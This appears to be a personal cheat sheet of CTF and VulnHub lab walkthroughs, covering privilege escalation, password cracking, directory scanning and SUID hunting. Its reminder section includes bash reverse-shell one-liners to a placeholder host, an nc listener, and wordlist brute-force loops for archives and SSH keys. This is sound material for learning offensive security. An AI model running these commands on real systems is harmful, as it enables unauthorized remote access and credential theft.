A script that checklist actions for privilege escalation from

https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist

And follow by :

https://github.com/mzet-/linux-exploit-suggester

And again :

https://github.com/liamg/traitor

Pour ne pas refaire les mêmes :)

CyberSploit: 1

robots.txt + kernel

CyberSploit: 2

rot47 + password sur site web + docker (GTFOBins)

Funbox3: Easy

easy password/SQL injection + p0wny-shell + sudo (time or pkexec or mtr)

FourAndSix2

nfs + hashcat (7z) + id_rsa (indice avec les images) + less (GTFOBins)

FourAndSix

mount /shared et mount / non exposé

Funbox1

wordpress low password (wpscan), upload shell/ssh user (joe) has same password, bad permissions between joe and funny, crontab executed by funny, reverse shell, put new ssh key on funny, funny member of lxd, (https://www.hackingarticles.in/lxd-privilege-escalation/ : new image, add mapping for root, connect to image. There is a faster way : root crontab run same script as funny :) :) : can modify /root or list flag or whatever, stickbit, add sudo...

Funbox2: Rookie

ftp anonymous, hidden files, list of protected zip, zip2john tous les zip, 2 ont des passwords facile, clé rsa non protégée, user appartient au group lxd, idem Funbox1 pour la suite

Funbox4: CTF

ROBOTS.txt, scroll down, hidden file : upload.php (add extension for dirb), upload shell, check user home, bruteforce with rockyou + ! for thomas and normaly gcc + exploit kernel but no gcc on server....

Quaoar:

wordpress low password or plugin vulnerability (wpscan), reverse shell, wpconfig (root db password), weak root (same as db) or weak wpadmin

Funbox5: next Level

dirb, plugin Request Control sur firefox (for IP redirection)

Pense bête

perl 7z2hashcat.pl ../tmp/backup.7z > ../tmp/hash.txt
#ou 
7z2john.py archive.7z > hash.txt

ensuite (https://infinitelogins.com/2020/04/29/how-to-crack-encrypted-7z-archives/) :

hashcat -m 11600 lightweight7z.hash /usr/share/wordlists/rockyou.txt

ou (https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c)

/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash 

En ligne de commande :

cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done

Pense-bête, scan des urls courantes

dirb http://url/ /usr/share/dirb/wordlists/vulns/apache.txt

Pour retrouver les sticky bits sur les répertoires :

find / -type d \( -perm -g+w -o -perm -o+w \) -exec ls -lad {} \;

Pour les fichiers (https://null-byte.wonderhowto.com/how-to/hack-like-pro-finding-potential-suid-sgid-vulnerabilities-linux-unix-systems-0158373/)

find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 2>/dev/null

Reverse shell from different source

Cheatsheet : https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Listen :

nc -l -vv -p <PORT>

Exemple bash :

bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done

exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0

0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196

Server-side template hacking helper

S'échapper des shells restreints.
Et on peut utiliser tar, zip, awk pour lancer un shell interactif, j'en apprends tous les jours...

Une checklist : https://github.com/frizb/Linux-Privilege-Escalation
Une autre : https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
A regarder : https://www.metahackers.pro/breakout-of-restricted-shell/

Frida, un outil pour faire du reverse-engineeing de binaires (en particulier du hooking d'appels).
(via http://sebsauvage.net/links/index.php?o-nb_A)

et aussi : http://www.showmycode.com/